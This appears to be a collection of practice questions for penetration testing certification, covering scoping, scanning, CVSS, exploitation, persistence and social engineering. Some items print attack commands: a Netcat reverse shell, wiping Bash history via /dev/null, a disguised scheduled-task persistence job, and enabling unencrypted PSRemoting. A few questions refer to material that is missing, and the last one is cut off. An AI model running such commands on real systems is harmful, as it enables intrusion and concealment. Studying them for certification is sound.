Penetration testing MCQ Questions --practice

 

1. Ricky is conducting a penetration test against a web application and is looking for potential

vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in

web applications?

A. SQL injection

B. VM escape

C. Buffer overflow

D. Cross-site scripting

2. What specialized type of legal document is often used to protect the confidentiality of data

and other information that penetration testers may encounter?

A. An SOW

B. An NDA

C. An MSA

D. A noncompete

3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability

search to include the use of dynamic testing. Which one of the following tools can he use as

an interception proxy?

A. ZAP

B. Nessus

C. SonarQube

D. OLLYDBG

4. Matt is part of a penetration testing team and is using a standard toolkit developed by his

team. He is executing a password cracking script named password.sh. What language is

this script most likely written in?

A. PowerShell

B. Bash

C. Ruby

D. Python

 

 

5. Renee is conducting a penetration test and discovers evidence that one of the systems she is

exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

A. Record the details in the penetration testing report.

B. Remediate the vulnerability that allowed her to gain access.

C. Report the potential compromise to the client.

D. No further action is necessary because Renee’s scope of work is limited to penetration

testing.

6. Which of the following vulnerability scanning methods will provide the most accurate

detail during a scan?

A. Black box

B. Authenticated

C. Internal view

D. External view

7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently prevent the commands she inputs to a Bash shell, which of the following commands should she use?

A. history -c

B. kill -9 $$

C. echo "" > /~/.bash_history

D. ln /dev/null ~/.bash_history -sf

8. Kaiden would like to perform an automated web application security scan of a new system

before it is moved into production. Which one of the following tools is best suited for this

task?

A. Nmap

B. Nikto

C. Wireshark

D. CeWL

 

 

9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

A. OSINT

B. HSI

C. Background

D. None of the above

10. Which of the following activities constitutes a violation of integrity?

A. Systems were taken offline, resulting in a loss of business income.

B. Sensitive or proprietary information was changed or deleted.

C. Protected information was accessed or exfiltrated.

D. Sensitive personally identifiable information was accessed or exfiltrated.

11. Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

A. 256

B. 1,000

C. 1,024

D. 65,535

12. Brian is conducting a thorough technical review of his organization’s web servers. He is

specifically looking for signs that the servers may have been breached in the past. What

term best describes this activity?

A. Penetration testing

B. Vulnerability scanning

C. Remediation

D. Threat hunting

13. Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

A. Started a reverse shell using Netcat

B. Captured traffic on the Ethernet port to the console via Netcat

C. Set up a bind shell using Netcat

D. None of the above

14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is

on. What technique does the following diagram show?

Preamble

1 23456781234561234561234 121 ... . N 123412345678 9 10 11 12

Destination MAC Source MAC 802.1Q

header

1 234

802.1Q

header

Ether

type

Payload CRC / FCS Inter-frame Gap

VLAN hopping attack

A. A double jump

B. A powerhop

C. Double tagging

D. VLAN squeezing

Assessment Test lix

15. Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

A. ARP spoofing

B. IP proofing

C. DHCP pirating

D. Spoofmastering

16. Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he

using?

A. Authority

B. Scarcity

C. Likeness

D. Social proof

17. Vincent wants to gain access to workstations at his target but cannot find a way into the

building. What technique can he use to do this if he is also unable to gain access remotely

or on site via the network?

A. Shoulder surfing

B. Kerberoasting

C. USB key drop

D. Quid pro quo

18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file

B. A hashed file

C. A SUID file

D. A SIP file

19. Which of the following tools is best suited to querying data provided by organizations like

the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

A. Nmap

B. Traceroute

C. regmon

D. Whois

20. Chris believes that the Linux system he has compromised is a virtual machine. Which

of the following techniques will not provide useful hints about whether the system is a

VM or not?

A. Run system-detect-virt

B. Run ls -l /dev/disk/by-id

C. Run wmic baseboard to get manufacturer, product

D. Run dmidecode to retrieve hardware information

……………………………………………………………………………………………………….

1. Tom is running a penetration test in a web application and discovers a flaw that allows

him to shut down the web server remotely. What goal of penetration testing has Tom most

directly achieved?

A. Disclosure

B. Integrity

C. Alteration

D. Denial

2. Brian ran a penetration test against a school’s grading system and discovered a flaw that

would allow students to alter their grades by exploiting a SQL injection vulnerability. What

type of control should he recommend to the school’s cybersecurity team to prevent students

from engaging in this type of activity?

A. Confidentiality

B. Integrity

C. Alteration

D. Availability

3. Edward Snowden gathered a massive quantity of sensitive information from the National

Security Agency and released it to the media. What type of attack did he wage?

A. Disclosure

B. Denial

C. Alteration

D. Availability

4. Assuming no significant changes in an organization’s cardholder data environment, how

often does PCI DSS require that a merchant accepting credit cards conduct penetration

testing?

A. Monthly

B. Semiannually

C. Annually

D. Biannually

5. Which one of the following is NOT a benefit of using an internal penetration testing team?

A. Contextual knowledge

B. Cost

C. Subject matter expertise

D. Independence

6. Which one of the following is NOT a reason to conduct periodic penetration tests of systems

and applications?

A. Changes in the environment

B. Cost

C. Evolving threats

D. New team members

7. Rich recently got into trouble with a client for using an attack tool during a penetration test

that caused a system outage. During what stage of the penetration testing process should

Rich and his clients have agreed upon the tools and techniques that he would use during

the test?

A. Planning and Scoping

B. Information Gathering and Vulnerability Identification

C. Attacking and Exploiting

D. Reporting and Communication Results

8. Which one of the following steps of the Cyber Kill Chain does not map to the Attacking

and Exploiting stage of the penetration testing process?

A. Weaponization

B. Reconnaissance

C. Installation

D. Actions on Objectives

 

9. Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in?

A. Planning and Scoping

B. Attacking and Exploiting

C. Information Gathering and Vulnerability Identification

D. Reporting and Communication Results

10. Which one of the following security assessment tools is not commonly used during the

Information Gathering and Vulnerability Identification phase of a penetration test?

A. Nmap

B. Nessus

C. Metasploit

D. Nslookup

 

11. During what phase of the Cyber Kill Chain does an attacker steal information, use computing resources, or alter information without permission?

A. Weaponization

B. Installation

C. Actions on Objectives

D. Command and Control

12. Grace is investigating a security incident where the attackers left USB drives containing

infected files in the parking lot of an office building. What stage in the Cyber Kill Chain

describes this action?

A. Weaponization

B. Installation

C. Delivery

D. Command and Control

13. Which one of the following is not an open-source intelligence gathering tool?

A. WHOIS

B. Nslookup

C. Nessus

D. FOCA

14. Which one of the following tools is an exploitation framework commonly used by

penetration testers?

A. Metasploit

B. Wireshark

C. Aircrack-ng

D. SET

15. Which one of the following tools is NOT a password cracking utility?

A. OWASP ZAP

B. Cain and Abel

C. Hashcat

D. Jack the Ripper

16. Which one of the following vulnerability scanners is specifically designed to test the

security of web applications against a wide variety of attacks?

A. OpenVAS

B. Nessus

C. sqlmap

D. Nikto

17. Which one of the following debugging tools does not support Windows systems?

A. GDB

B. OllyDbg

C. WinDbg

D. IDA

18. What is the final stage of the Cyber Kill Chain?

A. Weaponization

B. Installation

C. Actions on Objectives

D. Command and Control

19. Which one of the following activities assumes that an organization has already been

compromised?

A. Penetration testing

B. Threat hunting

C. Vulnerability scanning

D. Software testing

20. Alan is creating a list of recommendations that his organization can follow to remediate

issues identified during a penetration test. In what phase of the testing process is Alan

participating?

A. Planning and Scoping

B. Reporting and Communicating Results

C. Attacking and Exploiting

D. Information Gathering and Vulnerability Identification

…………………………………………………………………………………………………………………………

1. What term describes a document created to define project-specific activities, deliverables,

and timelines based on an existing contract?

A. NDA

B. MSA

C. SOW

D. MOD

2. What type of language is WSDL based on?

A. HTML

B. XML

C. WSML

D. DIML

3. Which of the following types of penetration test would provide testers with complete

visibility into the configuration of a web server without having to compromise the server

to gain that information?

A. Black box

B. Gray box

C. White box

D. Red box

4. What type of legal agreement typically covers sensitive data and information that a

penetration tester may encounter while performing an assessment?

A. A noncompete

B. An NDA

C. A data security agreement

D. A DSA

5. Which of the following threat actors is the most dangerous based on the adversary tier list?

A. APTs

B. Hacktivists

C. Insider threats

D. Organized crime

6. During a penetration test, Alex discovers that he is unable to scan a server that he was

able to successfully scan earlier in the day from the same IP address. What has most

likely happened?

A. His IP address was whitelisted.

B. The server crashed.

C. The network is down.

D. His IP address was blacklisted.

7. What does an MSA typically include?

A. The terms that will govern future agreements

B. Mutual support during assessments

C. Micro-services architecture

D. The minimum service level acceptable

8. While performing an on-site penetration test, Cassandra plugs her laptop into an accessible

network jack. When she attempts to connect, however, she does not receive an IP address

and gets no network connectivity. She knows that the port was working previously. What

technology has her target most likely deployed?

A. Jack whitelisting

B. Jack blacklisting

C. NAC

D. 802.15

9. What type of penetration test is not aimed at identifying as many vulnerabilities as possible

and instead focuses on vulnerabilities that specifically align with the goals of gaining

control of specific systems or data?

A. An objectives-based assessment

B. A compliance-based assessment

C. A black-team assessment

D. A red-team assessment

10. During an on-site penetration test, what scoping element is critical for wireless assessments

when working in shared buildings?

A. Encryption type

B. Wireless frequency

C. SSIDs

D. Preshared keys

11. What type of adversary is most likely to use only prewritten tools for their attacks?

A. APTs

B. Script kiddies

C. Hacktivists

D. Organized crime

12. During a penetration test specifically scoped to a single web application, Chris discovers

that the web server also contains a list of passwords to other servers at the target location.

After he notifies the client, they ask him to use them to validate those servers, and he

proceeds to test those passwords against the other servers. What has occurred?

A. Malfeasance

B. Pivoting

C. Scope creep

D. Target expansion

13. Lucas has been hired to conduct a penetration test of an organization that processes credit

cards. His work will follow the recommendations of the PCI DSS. What type of assessment

is Lucas conducting?

A. An objectives-based assessment

B. A red-team assessment

C. A black-team assessment

D. A compliance-based assessment

14. The penetration testing agreement document that Greg asks his clients to sign includes a

statement that the assessment is valid only at the point in time at which it occurs. Why

does he include this language?

A. His testing may create changes.

B. The environment is unlikely to be the same in the future.

C. Attackers may use the same flaws to change the environment.

D. The test will not be fully comprehensive.

15. What penetration testing strategy is also known as “zero knowledge” testing?

A. Black box testing

B. Grey box testing

C. Red-team testing

D. White box testing

16. Susan’s organization uses a technique that associates hosts with their public keys. What

type of technique are they using?

A. Key boxing

B. Certificate pinning

C. X.509 locking

D. Public key privacy

17. Charles has completed the scoping exercise for his penetration test and has signed the agreement with his client. Whose signature should be expected as the counter signature?

A. The information security officer

B. The project sponsor

C. The proper signing authority

D. An administrative assistant

18. Elaine wants to ensure that the limitations of her red-team penetration test are fully

explained. Which of the following are valid disclaimers for her agreement? (Choose two.)

A. Risk tolerance

B. Point-in-time

C. Comprehensiveness

D. Impact tolerance

19. During the scoping phase of a penetration test, Lauren is provided with the IP range of the

systems she will test, as well as information about what the systems run, but she does not

receive a full network diagram. What type of assessment is she most likely conducting?

A. A white box assessment

B. A crystal box assessment

C. A gray box assessment

D. A black box assessment

20. What type of assessment most closely simulates an actual attacker’s efforts?

A. A red-team assessment with a black box strategy

B. A goals-based assessment with a white box strategy

C. A red-team assessment with a crystal box strategy

D. A compliance-based assessment with a black box strategy .. 51 91

………………………………………………………………………………………………………………………113 477

1. Mika runs the following Nmap scan: 188

nmap -sU -sT -p 1-65535 example.com

What information will she NOT receive?

A. TCP services

B. The state of the service

C. UDP services

D. MOD

2. What technique is being used in the following command:

host -t axfr domain.com dns1.domain.com

A. DNS query

B. Nslookup

C. Dig scan

D. Zone transfer

3. After running an Nmap scan of a system, Lauren discovers that TCP ports 139, 443, and

3389 are open. What operating system is she most likely to discover running on the system?

A. Windows

B. Android

C. Linux

D. iOS

4. Charles runs an Nmap scan using the following command:

nmap -sT -sV -T2 -p 1-65535 example.com

After watching the scan run for over two hours, he realizes that he needs to optimize

the scan. Which of the following is not a useful way to speed up his scan?

A. Only scan via UDP to improve speed.

B. Change the scan timing to 3 or faster.

C. Change to a SYN scan.

D. Use the default port list.

5. Karen identifies TCP ports 8080 and 8443 open on a remote system during a port scan.

What tool is her best option to manually validate running on these ports?

A. SSH

B. SFTP

C. Telnet

D. A web browser

6. Angela recovered a PNG image during the early intelligence-gathering phase of a

penetration test and wants to examine it for useful metadata. What tool could she most

successfully use to do this?

A. ExifTool

B. Grep

C. PsTools

D. Nginx

7. During an Nmap scan, Casey uses the -O flag. The scan identifies the host as follows:

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

What can she determine from this information?

A. The Linux distribution installed on the target

B. The patch level of the installed Linux kernel

C. The date the remote system was last patched

D. That the system is running a Linux 2.6 kernel between .9 and .33

8. What is the full range of ports that a UDP service can run on?

A. 1–1024

B. 1–16,383

C. 1–32,767

D. 1–65,535

9. Steve is working from an un-privileged user account that was obtained as part of a

penetration test. He has discovered that the host he is on has Nmap installed and wants to

scan other hosts in his subnet to identify potential targets as part of a pivot attempt. What

Nmap flag is he likely to have to use to successfully scan hosts from this account?

A. -sV

B. -u

C. -oA

D. -sT

10. Which of the following tools provides information about a domain’s registrar and physical

location?

A. Nslookup

B. Host

C. WHOIS

D. Traceroute

11. Chris runs an Nmap scan of the 10.10.0.0/16 network that his employer uses as an internal

network range for the entire organization. If he uses the -T0 flag, what issue is he likely to

encounter?

A. The scan will terminate when the host count reaches 0.

B. The scan will not scan IP addresses in the .0 network.

C. The scan will progress at a very slow speed.

D. The scan will only scan for TCP services.

12. Which of the following Nmap output formats is unlikely to be useful for a penetration

tester?

A. -oA

B. -oS

C. -oG

D. -oX

13. During an early phase of his penetration test, Mike recovers a binary executable file that he

wants to quickly analyze for useful information. Which of the following tools will quickly

give him a view of potentially useful information in the binary?

A. Netcat

B. strings

C. Hashmod

D. Eclipse

14. Jack is conducting a penetration test for a customer in Japan. What NIC is he most likely to

need to check for information about his client’s networks?

A. RIPE

B. ARIN

C. APNIC

D. LACNIC

15. After running an SNMP sweep, Greg finds that he didn’t receive any results. If he knows

there are no network protection devices in place and that there are devices that should

respond to SNMP queries, what problem does he most likely have?

A. The SNMP private string is set.

B. There is an incorrect community string.

C. SNMP only works on port 25.

D. SNMP sweeps require the network to support broadcast traffic.

Review Questions 97

16. Charles uses the following hping command to send traffic to a remote system.

hping remotesite.com -S -V -p 80

What type of traffic will the remote system see?

A. HTTP traffic to TCP port 80

B. TCP SYNs to TCP port 80

C. HTTPS traffic to TCP port 80

D. A TCP three-way handshake to TCP port 80

17. What does a result of * * * mean during a traceroute?

A. No route to host.

B. All hosts queried.

C. No response to the query, perhaps a timeout, but traffic is going through.

D. A firewall is blocking responses.

18. Rick wants to look at the advertised routes to his target. What type of service should he

look for to do this?

A. A BGP looking glass

B. A RIP-off

C. An IGRP relay

D. A BGP tunnel

19. Why would a penetration tester look for expired certificates as part of an information gathering and enumeration exercise?

A. They indicate improper encryption, allowing easy decryption of traffic.

B. They indicate services that may not be properly updated or managed.

C. Attackers install expired certificates to allow easy access to systems.

D. Penetration testers will not look for expired certificates; they only indicate procedural

issues.

20. John has gained access to a system that he wants to use to gather more information about

other hosts in its local subnet. He wants to perform a port scan but cannot install other

tools to do so. Which of the following tools isn’t usable as a port scanner?

A. Hping

B. Netcat

C. Telnet

D. ExifTool

…………………………………………………………………………………………………………………………………..

1. Ryan is conducting a penetration test and is targeting a database server. Which one of the

following tools would best assist him in detecting vulnerabilities on that server?

A. Nessus

B. Nikto

C. Sqlmap

D. OpenVAS

2. Gary is conducting a black box penetration test against an organization and is gathering

vulnerability scanning results for use in his tests. Which one of the following scans is most

likely to provide him with helpful information within the bounds of his test?

A. Stealth internal scan

B. Full internal scan

C. Stealth external scan

D. Full external scan

3. What tool can white box penetration testers use to help identify the systems present on a

network prior to conducting vulnerability scans?

A. Asset inventory

B. Web application assessment

C. Router

D. DLP

4. Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS

compliance standard. What is the minimum frequency with which she must conduct scans?

A. Daily

B. Weekly

C. Monthly

D. Quarterly

5. Which one of the following is not an example of a vulnerability scanning tool?

A. QualysGuard

B. Snort

C. Nessus

D. OpenVAS

Review Questions 133

6. Which one of the following technologies, when used within an organization, is the LEAST

likely to interfere with vulnerability scanning results achieved by external penetration

testers?

A. Encryption

B. Firewall

C. Containerization

D. Intrusion prevention system

7. Renee is configuring her vulnerability management solution to perform credentialed scans

of servers on her network. What type of account should she provide to the scanner?

A. Domain administrator

B. Local administrator

C. Root

D. Read-only

8. Jason is writing a report about a potential security vulnerability in a software product and

wishes to use standardized product names to ensure that other security analysts understand

the report. Which SCAP component can Jason turn to for assistance?

A. CVSS

B. CVE

C. CPE

D. OVAL

9. Ken is planning to conduct a vulnerability scan of an organization as part of a penetration

test. He is conducting a black box test. When would it be appropriate to conduct an

internal scan of the network?

A. During the planning stage of the test

B. As soon as the contract is signed

C. After receiving permission from an administrator

D. After compromising an internal host

10. Which type of organization is the most likely to face a regulatory requirement to conduct

vulnerability scans?

A. Bank

B. Hospital

C. Government agency

D. Doctor’s office

11. Which one of the following categories of systems is most likely to be disrupted during a

vulnerability scan?

A. External web server

B. Internal web server

C. IoT device

D. Firewall

12. What term describes an organization’s willingness to tolerate risk in their computing

environment?

A. Risk landscape

B. Risk appetite

C. Risk level

D. Risk adaptation

13. Which one of the following factors is least likely to impact vulnerability scanning

schedules?

A. Regulatory requirements

B. Technical constraints

C. Business constraints

D. Staff availability

14. Adam is conducting a penetration test of an organization and is reviewing the source code

of an application for vulnerabilities. What type of code testing is Adam conducting?

A. Mutation testing

B. Static code analysis

C. Dynamic code analysis

D. Fuzzing

15. Ryan is planning to conduct a vulnerability scan of a business-critical system using

dangerous plug-ins. What would be the best approach for the initial scan?

A. Run the scan against production systems to achieve the most realistic results possible.

B. Run the scan during business hours.

C. Run the scan in a test environment.

D. Do not run the scan to avoid disrupting the business.

16. Which one of the following activities is not part of the vulnerability management life cycle?

A. Detection

B. Remediation

C. Reporting

D. Testing

17. What approach to vulnerability scanning incorporates information from agents running on

the target servers?

A. Continuous monitoring

B. Ongoing scanning

C. On-demand scanning

D. Alerting

18. Brian is seeking to determine the appropriate impact categorization for a federal

information system as he plans the vulnerability scanning controls for that system. After

consulting management, he discovers that the system contains information that, if disclosed

improperly, would have a serious adverse impact on the organization. How should this

system be categorized?

A. Low impact

B. Moderate impact

C. High impact

D. Severe impact

19. Jessica is reading reports from vulnerability scans run by different parts of her organization

using different products. She is responsible for assigning remediation resources and is

having difficulty prioritizing issues from different sources. What SCAP component can help

Jessica with this task?

A. CVSS

B. CVE

C. CPE

D. XCCDF

20. Sarah is conducting a penetration test and discovers a critical vulnerability in an

application. What should she do next?

A. Report the vulnerability to the client’s IT manager

B. Consult the SOW

C. Report the vulnerability to the developer

D. Exploit the vulnerability

…………………………………………………………………………………………………………………………………

1. Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in

use on this network that resulted in this vulnerability?

A. TLS

B. NAT

C. SSH

D. VPN

2. Which one of the CVSS metrics would contain information about the number of times an

attacker must successfully authenticate to execute an attack?

A. AV

B. C

C. Au

D. AC

3. Which one of the following values for the CVSS access complexity metric would indicate

that the specified attack is simplest to exploit?

A. High

B. Medium

C. Low

D. Severe

4. Which one of the following values for the confidentiality, integrity, or availability CVSS

metric would indicate the potential for total compromise of a system?

A. N

B. A

C. P

D. C

5. What is the most recent version of CVSS that is currently available?

A. 1.0

B. 2.0

C. 2.5

D. 3.0

6. Which one of the following metrics is not included in the calculation of the CVSS exploitability score?

A. Access vector

B. Vulnerability age

C. Access complexity

D. Authentication

7. Kevin recently identified a new security vulnerability and computed its CVSSv2 base score

as 6.5. Which risk category would this vulnerability fall into?

A. Low

B. Medium

C. High

D. Critical

8. Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as

specified. What type of error occurred?

A. False positive

B. False negative

C. True positive

D. True negative

9. Which one of the following is not a common source of information that may be correlated

with vulnerability scan results?

A. Logs

B. Database tables

C. SIEM

D. Configuration management system

10. Which one of the following operating systems should be avoided on production networks?

A. Windows Server 2003

B. Red Hat Enterprise Linux 7

C. CentOS 7

D. Ubuntu 16

11. In what type of attack does the attacker place more information in a memory location than

is allocated for that use?

A. SQL injection

B. LDAP injection

C. Cross-site scripting

D. Buffer overflow

12. The Dirty COW attack is an example of what type of vulnerability?

A. Malicious code

B. Privilege escalation

C. Buffer overflow

D. LDAP injection

13. Which one of the following protocols should never be used on a public network?

A. SSH

B. HTTPS

C. SFTP

D. Telnet

14. Betty is selecting a transport encryption protocol for use in a new public website she is

creating. Which protocol would be the best choice?

A. SSL 2.0

B. SSL 3.0

C. TLS 1.0

D. TLS 1.1

15. Which one of the following conditions would not result in a certificate warning during a

vulnerability scan of a web server?

A. Use of an untrusted CA

B. Inclusion of a public encryption key

C. Expiration of the certificate

D. Mismatch in certificate name

16. What software component is responsible for enforcing the separation of guest systems in a

virtualized infrastructure?

A. Guest operating system

B. Host operating system

C. Memory controller

D. Hypervisor

17. In what type of attack does the attacker seek to gain access to resources assigned to a

different virtual machine?

A. VM escape

B. Management interface brute force

C. LDAP injection

D. DNS amplification

Review Questions 179

18. Which one of the following terms is not typically used to describe the connection of physical devices to a network?

A. IoT

B. IDS

C. ICS

D. SCADA

19. Monica discovers that an attacker posted a message attacking users who visit a web forum

that she manages. Which one of the following attack types is most likely to have occurred?

A. SQL injection

B. Malware injection

C. LDAP injection

D. Cross-site scripting

20. Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?

A. SQL injection

B. LDAP injection

C. Cross-site scripting

D. Buffer overflow

………………………………………………………………………………………………………………………….

2. Which of the entries should Charles prioritize from this list if he wants to gain access to the

system?

A. The Ruby on Rails vulnerability

B. The OpenSSH vulnerability

C. The MySQL vulnerability

D. None of these; he should find another target.

3. If Charles wants to build a list of additional system user accounts, which of the vulnerabilities is most likely to deliver that information?

A. The Ruby on Rails vulnerability

B. The OpenSSH vulnerability

C. The MySQL vulnerability

D. Both the OpenSSH and MySQL vulnerabilities

4. If Charles selects the Ruby on Rails vulnerability, which of the following methods cannot

be used to search for an existing Metasploit vulnerability?

A. CVE

B. BID

C. MSF

D. EDB

5. Matt wants to pivot from a Linux host to other hosts in the network but is unable to

install additional tools beyond those found on a typical Linux server. How can he leverage

the system he is on to allow vulnerability scans of those remote hosts if they are firewalled

against inbound connections and protected from direct access from his penetration testing

workstation?

A. SSH tunneling

B. Netcat port forwarding

C. Enable IPv6

D. Modify browser plug-ins

6. After gaining access to a Windows system, Fred uses the following command:

SchTasks /create /SC Weekly /TN "Antivirus" /TR C:\Users\SSmith\av.exe"

/ST 09:00

What has he accomplished?

A. He has set up a weekly antivirus scan.

B. He has set up a job called “weekly.”

C. He has scheduled his own executable to run weekly.

D. Nothing; this command will only run on Linux.

7. After gaining access to a Linux system through a vulnerable service, Cassandra wants to

list all of the user accounts on the system and their home directories. Which of the following locations will provide this list?

A. /etc/shadow

B. /etc/passwd

C. /var/usr

D. /home

8. A few days after exploiting a target with the Metasploit Meterpreter payload, Robert loses

access to the remote host. A vulnerability scan shows that the vulnerability that he used to

exploit the system originally is still open. What has most likely happened?

A. A malware scan discovered Meterpreter and removed it.

B. The system was patched.

C. The system was rebooted.

D. Meterpreter crashed.

9. Angela wants to run John the Ripper against a hashed password file she has acquired from

a compromise. What information does she need to know to successfully crack the file?

A. A sample word list

B. The hash used

C. The number of passwords

D. None of the above

10. Chris cross compiles code for his exploit and then deploys it. Why would he cross-compile code?

A. To make it run on multiple platforms

B. To add additional libraries

C. To run it on a different architecture

D. To allow him to inspect the source code

11. Lauren has acquired a list of valid user accounts but does not have passwords for them. If

she has not found any vulnerabilities but believes that the organization she is targeting has

poor password practices, what type of attack can she use to try to gain access to a target

system where those usernames are likely valid?

A. Rainbow tables

B. Dictionary attacks

C. Thesaurus attacks

D. Meterpreter

12. What built-in Windows server administration tool can allow command-line PowerShell

access from other systems?

A. VNC

B. PowerSSHell

C. PSRemote

D. RDP

13. John wants to retain access to a Linux system. Which of the following is not a common

method of maintaining persistence on Linux servers?

A. Scheduled tasks

B. Cron jobs

C. Trojaned services

D. Modified daemons

14. Tim has selected his Metasploit exploit and set his payload as cmd/unix/generic. After

attempting the exploit, he receives the following output. What went wrong?

A. The remote host is firewalled.

B. The remote host is not online.

C. The host is not routable.

D. The remote host was not set.

15. Cameron runs the following command via an administrative shell on a Windows system he

has compromised. What has he accomplished?

$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig

-Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item

WSMan:\localhost\Service\AllowUnencrypted

-Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell

-Force'

A. He has enabled PowerShell for local users.

B. He has set up PSRemoting.

C. He has disabled remote command-line access.

D. He has set up WSMan.

16. Mike discovers a number of information exposure vulnerabilities while preparing for the

exploit phase of a penetration test. If he has not been able to identify user or service information beyond vulnerability details, what priority should he place on exploiting them?

A. High priority; exploit early.

B. Medium priority; exploit after other system and service exploits have been attempted.

C. Low priority; only exploit if time permits.

D. Do not exploit; information exposure exploits are not worth conducting.

17. Part of Annie’s penetration testing scope of work and rules of engagement allows her physical access to the facility she is testing. If she cannot find a remotely exploitable service,

which of the following social engineering methods is most likely to result in remote access?

A. Dumpster diving

B. Phishing

C. A thumb drive drop

D. Impersonation on a help desk call

18. Jacob wants to capture user hashes on a Windows network. Which tool could he select to

gather these from broadcast messages?

A. Metasploit

B. Responder

C. Impacket

D. Wireshark

Review Questions 221

19. Cynthia wants to find a Metasploit framework exploit that will not crash the remote service

she is targeting. What ranking must the exploit she chooses meet or exceed to ensure this?

A. Excellent

B. Great

C. Good

D. Normal

20. Alex wants to use rainbow tables against a password file she has captured. How do rainbow tables crack passwords?

A. Un-hashing the passwords

B. Comparing hashes to identify known values

C. Decrypting the passwords

D. Brute-force testing of hashes

………………………………………………………………………………………………………………………..

 

1. Cynthia wants to use a phishing attack to acquire credentials belonging to the senior leadership of her target. What type of phishing attack should she use?

A. Smishing

B. VIPhishing

C. Whaling

D. Spear phishing

2. Mike wants to enter an organization’s high-security data center. Which of the following

techniques is most likely to stop his tailgating attempt?

A. Security cameras

B. A mantrap

C. An egress sensor

D. An RFID badge reader

3. Which of the following technologies is most resistant to badge cloning attacks if implemented properly?

A. Low frequency RFID

B. Magstripes

C. Medium frequency RFID

D. Smart cards

Use the following scenario for questions 4, 5, and 6.

Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her

penetration test, she has been asked to conduct a phishing campaign and to use the results

of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely.

4. Jen wants to send a phishing message to employees at the company. She wants to learn the

user IDs of various targets in the company and decides to call them using a spoofed VoIP

phone number similar to those used inside the company. Once she reaches her targets, she

pretends to be an administrative assistant working with one of Flamingo’s senior executives and asks her targets for their email account information. What type of social engineering is this?

A. Impersonation

B. Interrogation

C. Shoulder surfing

D. Administrivia

Review Questions 279

5. Jen wants to deploy a malicious website as part of her penetration testing attempt so that

she can exploit browsers belonging to employees. What framework is best suited to this?

A. Metasploit

B. BeEF

C. SET

D. OWASP

6. After attempting to lure employees at Flamingo, Inc., to fall for a phishing campaign, Jen

finds that she hasn’t acquired any useful credentials. She decides to try a USB keydrop.

Which of the following Social Engineering Toolkit modules should she select to help her

succeed?

A. The website attack vectors module

B. The Infectious Media Generator

C. The Mass Mailer Module

D. The Teensy USB HID attack module

7. Chris sends a phishing email specifically to Susan, the CEO at his target company. What

type of phishing attack is he conducting?

A. CEO baiting

B. Spear phishing

C. Phish hooking

D. Hook SETting

8. While Frank is performing a physical penetration test, he notices that the exit doors to the

data center open automatically as an employee approaches them with a cart. What should

he record in his notes?

A. The presence of an egress sensor

B. The presence of a mantrap

C. A potential unlocked door

D. Nothing because this is not a vulnerability

9. Emily wants to gather information about an organization, but does not want to enter the

building. What physical data gathering technique can she use to potentially gather business

documents without entering the building?

A. Piggybacking

B. File surfing

C. USB drops

D. Dumpster diving

280 Chapter 8 Exploiting Physical and Social Vulnerabilities

10. Cameron is preparing to travel to another state to perform a physical penetration test. What

penetration testing gear should he review the legality of before leaving for that state?

A. Metasploit

B. Lockpicks

C. Encryption tools

D. SET

11. Which social engineering motivation technique relies on persuading the target that other

people have behaved similarly and thus that they could too?

A. Likeness

B. Fear

C. Social proof

D. Reciprocation

12. What is the default read-only community string for many SNMP devices?

A. secret

B. readonly

C. private

D. public

13. Allan wants to gain access to a target company’s premises but discovers that his original

idea of jumping the fence probably isn’t practical. Which factor is least likely to prevent him

from trying to jump the fence?

A. Barbed wire

B. A gate

C. Fence height

D. Security guards

14. Charles sends a phishing email to a target organization and includes the line “Only five

respondents will receive a cash prize.” Which social engineering motivation strategy is he

using?

A. Scarcity

B. Social proof

C. Fear

D. Authority

15. What occurs during a quid pro quo social engineering attempt?

A. The target is offered money.

B. The target is asked for money.

C. The target is made to feel indebted.

D. The penetration tester is made to feel indebted.

Review Questions 281

16. Andrew knows that the employees at his target company frequently visit a football discussion site popular in the local area. As part of his penetration testing, he successfully places

malware on the site and takes over multiple PCs belonging to employees. What type of

attack has he used?

A. A PWNie attack

B. A watercooler attack

C. A clone attack

D. A watering hole attack

17. Steve inadvertently sets off an alarm and is discovered by a security guard during an on-site

penetration test. What should his first response be?

A. Call the police

B. Attempt to escape

C. Provide his pretext

D. Call his organizational contact

18. A USB key drop is an example of what type of technique?

A. Physical honeypot

B. A humanitarian exploit

C. Reverse dumpster diving

D. A hybrid attack

19. Susan calls staff at the company she has been contracted to conduct a phishing campaign

against, focusing on individuals in the finance department. Over a few days, she persuades

an employee to send a wire transfer to an account she has set up after telling the employee

that she has let their boss know how talented they are. What motivation technique has she

used?

A. Urgency

B. Reciprocation

C. Authority

D. Fear

20. Alexa carefully pays attention to an employee as they type in their entry code to her target

organization’s high security area and writes down the code that she observes. What type of

attack has she conducted?

A. A Setec Astronomy attack
